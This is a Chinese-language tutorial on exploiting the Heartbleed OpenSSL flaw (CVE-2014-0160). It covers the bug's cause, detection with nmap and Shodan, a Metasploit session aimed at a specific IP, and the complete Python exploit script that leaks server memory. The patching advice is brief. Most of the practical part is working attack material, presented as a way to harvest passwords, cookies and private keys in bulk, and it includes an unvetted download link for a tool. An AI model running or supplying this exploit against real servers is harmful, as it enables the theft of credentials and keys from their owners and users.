心脏出血漏洞利用
0x0引言~
心臟出血(英語:Heartbleed),也簡稱為心血漏洞,是一個出現在加密程序庫OpenSSL的安全漏洞,該程序庫廣泛用于實現互聯網的傳輸層安全(TLS)協議。它于2012年被引入了軟件中,2014年4月首次向公眾披露。只要使用的是存在缺陷的OpenSSL實例,無論是服務器還是客戶端,都可能因此而受到攻擊。此問題的原因是在實現TLS的心跳擴展時沒有對輸入進行適當驗證(缺少邊界檢查),因此漏洞的名稱來源于“心跳”(heartbeat)。該程序錯誤屬于緩沖區過讀,即可以讀取的數據比應該允許讀取的還多。
文章目錄
-
漏洞詳情
- 漏洞描述
- 漏洞范圍
- 漏洞成因
- 漏洞危害
-
漏洞探測
- nmap探測
- 專屬工具探測
- 搜索引擎探測
-
實戰利用
- msf利用
- EXP利用
-
修補方案
一、漏洞詳情
一、漏洞描述
在OpenSSL1.0.1版本中存在嚴重漏洞(CVE-2014-0160),此次漏洞問題存在于ssl/dl_both.c文件中。OpenSSL Heartbleed模塊存在一個BUG,當攻擊者構造一個特殊的數據包,滿足用戶心跳包中無法提供足夠多的數據會導致memcpy把SSLv3記錄之后的數據直接輸出,該漏洞導致攻擊者可以遠程讀取存在漏洞版本的openssl服務器內存中64K的數據,該漏洞主要存在與OpenSSL的1.0.1版本到1.0.1f版本
二、漏洞范圍
該漏洞主要存在于OpenSSL以下版本:
1.OpenSSL 1.0.2-beta
2.OpenSSL 1.0.1 - OpenSSL 1.0.1f
三、漏洞成因
Heartbleed漏洞,這項嚴重缺陷(CVE-2014-0160)的產生是由于未能在memcpy()調用受害用戶輸入內容作為長度參數之前正確進行邊界檢查。攻擊者可以追蹤OpenSSL所分配的64KB緩存、將超出必要范圍的字節信息復制到緩存當中再返回緩存內容,這樣一來受害者的內存內容就會以每次64KB的速度進行泄露
四、漏洞危害
該漏洞具有隨機性,攻擊者可通過該漏洞讀取網絡服務器內存中的敏感數據信息(每次利用該漏洞可讀取目標的64K敏感信息),只要有足夠的耐心和時間,就可以翻檢足夠多的數據,拼湊出戶主的銀行密碼、私信等敏感數據,利用該漏洞可以獲取到服務器的私鑰,用戶cookie和賬號密碼等
漏洞探測
一、nmap探測
nmap.exe -sV -p443 --script ssl-heartbleed.nse -v ip/域名通過nmap反饋結果可以看出目標存在心臟滴血漏洞
二、專屬工具探測(推薦)
工具傳送門:https://pan.baidu.com/s/11Y7A7USLlS9l_dxsrHvbcg
提取碼:jcaz
三、搜索引擎探測
可利用shodan進行全網探測
openssl/1.0.1a實戰利用
一、msf利用
1.命令行輸入 search openssl 查看關于openssl的漏洞模塊
root@kali:~# msfconsole msf5 > search openssl
可以看到有auxiliary(輔助)模塊和exploit(攻擊)模塊,而我們現在要使用的是模塊4,用來進行對Heartbleed的漏洞利用
需要設置的options:
msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rhosts ip rhosts => 37.18.75.111 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 端口 rport => 443 msf5 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true verbose => true msf5 auxiliary(scanner/ssl/openssl_heartbleed) > exploit每次exploit 可獲取64K信息,只要有足夠的耐心和時間,就可以翻檢足夠多的數據,拼湊出用戶的各類信息,雖然此漏洞存在隨機性,但是實現方法簡易快捷,可批量攻擊,故存在較高的危險性
二、EXP利用
完整的exp:
import sys import struct import socket import time import select import re from optparse import OptionParseroptions = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)') options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)') options.add_option('-s', '--starttls', type='string', default='', help='STARTTLS protocol: smtp, pop3, imap, ftp, or xmpp')def h2bin(x):return x.replace(' ', '').replace('\n', '').decode('hex')hello = h2bin(''' 16 03 02 00 dc 01 00 00 d8 03 02 53 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00 00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88 00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09 c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44 c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11 00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04 03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19 00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00 00 0f 00 01 01 ''')hb = h2bin(''' 18 03 02 00 03 01 40 00 ''')def hexdump(s):for b in xrange(0, len(s), 16):lin = [c for c in s[b : b + 16]]hxdat = ' '.join('%02X' % ord(c) for c in lin)pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)print ' %04x: %-48s %s' % (b, hxdat, pdat)printdef recvall(s, length, timeout=4):endtime = time.time() + timeoutrdata = ''remain = lengthwhile remain > 0:rtime = endtime - time.time()if rtime < 0:return Noner, w, e = select.select([s], [], [], 5)if s in r:data = s.recv(remain)# EOF?if not data:return Nonerdata += dataremain -= len(data)return rdatadef recvmsg(s):hdr = recvall(s, 5)if hdr is None:print 'Unexpected EOF receiving record header - server closed connection'return None, None, Nonetyp, ver, ln = struct.unpack('>BHH', hdr)pay = recvall(s, ln, 10)if pay is None:print 'Unexpected EOF receiving record payload - server closed connection'return None, None, Noneprint ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))return typ, ver, paydef hit_hb(s):s.send(hb)while True:typ, ver, pay = recvmsg(s)if typ is None:print 'No heartbeat response received, server likely not vulnerable'return Falseif typ == 24:print 'Received heartbeat response:'hexdump(pay)if len(pay) > 3:print 'WARNING: server returned more data than it should - server is vulnerable!'else:print 'Server processed malformed heartbeat, but did not return any extra data.'return Trueif typ == 21:print 'Received alert:'hexdump(pay)print 'Server returned error, likely not vulnerable'return FalseBUFSIZ = 1024def main():opts, args = options.parse_args()if len(args) < 1:options.print_help()returns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)print 'Connecting...'s.connect((args[0], opts.port))if opts.starttls != '':print 'Sending STARTTLS Protocol Command...'if opts.starttls == 'smtp':s.recv(BUFSIZ)s.send("EHLO openssl.client.net\n")s.recv(BUFSIZ)s.send("STARTTLS\n")s.recv(BUFSIZ)if opts.starttls == 'pop3':s.recv(BUFSIZ)s.send("STLS\n")s.recv(BUFSIZ)if opts.starttls == 'imap':s.recv(BUFSIZ)s.send("STARTTLS\n")s.recv(BUFSIZ)if opts.starttls == 'ftp':s.recv(BUFSIZ)s.send("AUTH TLS\n")s.recv(BUFSIZ)if opts.starttls == 'xmpp': # TODO: This needs SASLs.send("<stream:stream xmlns:stream='http://etherx.jabber.org/streams' xmlns='jabber:client' to='%s' version='1.0'\n")s.recv(BUFSIZ)print 'Sending Client Hello...'s.send(hello)print 'Waiting for Server Hello...'while True:typ, ver, pay = recvmsg(s)if typ == None:print 'Server closed connection without sending Server Hello.'return# Look for server hello done message.if typ == 22 and ord(pay[0]) == 0x0E:breakprint 'Sending heartbeat request...'sys.stdout.flush()s.send(hb)hit_hb(s)if __name__ == '__main__':main()exp利用方式:python+exp.py+ip/域名
注:每次使用exp可獲取64k敏感數據
修補方案
要解決此漏洞,建議服務器管理員或使用1.0.1g版,或使用-DOPENSSL_NO_HEARTBEATS選項重新編譯OpenSSL,從而禁用易受攻擊的功能,直至可以更新服務器軟件
總結
- 上一篇: lower_bound,upper_bo
- 下一篇: STM32H743必要外围电路分析